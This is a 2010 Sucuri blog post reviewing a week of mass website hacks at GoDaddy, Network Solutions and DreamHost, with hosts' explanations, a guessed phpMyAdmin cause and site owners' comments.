• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Last week attacks – Some comments and updates

May 11, 2010David Dede

FacebookTwitterSubscribe

Last week as a busy one.

First, thousands of GoDaddy sites got hacked with that kdjkfjskdfjlskdjf.com malware.

A few days later, hundreds of Network Solutions sites got hacked by using the php.ini/cgi-bin malware (including the US Treasury site).

The next day, more thousands of sites at different providers (GoDaddy, Dreamhost, hostgator, etc) got hacked with the MW:MROBH:1 malware.

So, what was going on?

Network Solutions attack

The problem at Network Solutions was caused by an internal application used on their hosting platform that allowed the exploit to happen. They fixed it already, so the problem should not reoccur. The number of infected sites was around 500.

GoDaddy

GoDaddy blamed the users (saying they were using old WordPress versions) and didn’t provide us with information regarding what happened. We know that WordPress wasn’t the problem (we saw sites using the latest version getting hacked), so no one knows what happened. Probably thousands of sites got hacked.

DreamHost

DreamHost contacted us and explained that in their platform the issue was caused by a “specific backdoor shell that we’ve seen used in conjunction with a variety of redirect and SEO related hacks.”. Around 500 sites got hacked. Their statement:

We’ve seen a dozen or so examples of this passed to us via support and have researched it ourselves . It seems to be related to a specific backdoor shell that we’ve seen used in conjunction with a variety of redirect and SEO related hacks.

A scan across all our server files for known shells was done across customer HTTP servers and they were deleted . 550 account owners were contacted with notification of the finding of this backdoor shell file and the changing of their related FTP passwords. They were also provided directions for removing some of the common derivative hacks that have been associated with it, including a link to your web site and further directions to make use of SFTP exclusively due to FTP’s inherent security constraints. The great majority of these shells were added (as indicated by file date) in late November and December .

How are they getting in?

The Network Solutions issue was explained and fixed. At Dreamhost, it was a PHP shell. But how about the others? How were the attackers able to inject content on all these sites?

Skyphire (and others), in our comments, mentioned that the infected files had a PHPMyAdmin cookie added, which would indicate a bug (maybe 0-day) on PHPMyAdmin. That would be a possible cause since all those shared hosts are using PHPMyadmin. This is the cookie added:


getCookie("pma_visited_theme1");

We can’t prove it, but we will keep an eye to find out exactly what is going on. Have more info? Let us know.


As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

FacebookTwitterSubscribe

Categories: Sucuri Updates, Web Pros, Website Security, WordPress SecurityTags: Hacked Websites

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Anonymous

    May 11, 2010

    Been a tough 5 weeks. Appreciate all your coverage and help.

  2. Bourgy.com

    May 11, 2010

    Any guesses on the GoDaddy exploit?

  3. Bourgy.com

    May 12, 2010

    Just been hijacked again

  4. tintin

    May 12, 2010

    Hey Great post. Really a very nice piece of information.
    Thanks for sharing this

    Regards
    Web development solution

  5. Anonymous

    May 12, 2010

    Godaddy is full of shit. They blamed wordpress on our case too. Do you think it might have been through our openx install? Thank you for your cleaner. That did the trick for us for now.

  6. Anonymous

    May 12, 2010

    This is one of the best posts I've seen in a month of this crap, and believe me I've read a lot of them… This morning my site got hacked for the 3rd time, and I'm REALLY TRULY ABSOLUTELY POSITIVE it's nothing I am or am not doing, do you hear that GoDaddy?? (and yes I've been running WP 2.9.2 since February, but as the good detective here points out, WP is NOT the issue – it's something with PHP).

    One thing for sure I discovered today: GoDaddy FAILS this test on PHP (this was also posted elsewhere on this excellent site):

    http://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/page__view__findpost__p__592577078

    http://core.trac.wordpress.org/ticket/11122

    GoDaddy had better come clean with the details about what's truly going on (they did not reveal significant details during their WPSecurityLock conf. call), or they will find customers leaving by the THOUSANDS, and SOON.

  7. Anonymous

    May 12, 2010

    People want answers! Without them we will not feel comfortable…

    Thank you Securi.net for helping provide them.

  8. lukeprog

    May 17, 2010

    I think my website got hacked by way of a virus getting on my machine and stealing my FTP password. My XP machine got a virus and within a few hours somebody said my website was showing them a virus. I'm on MediaTemple.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.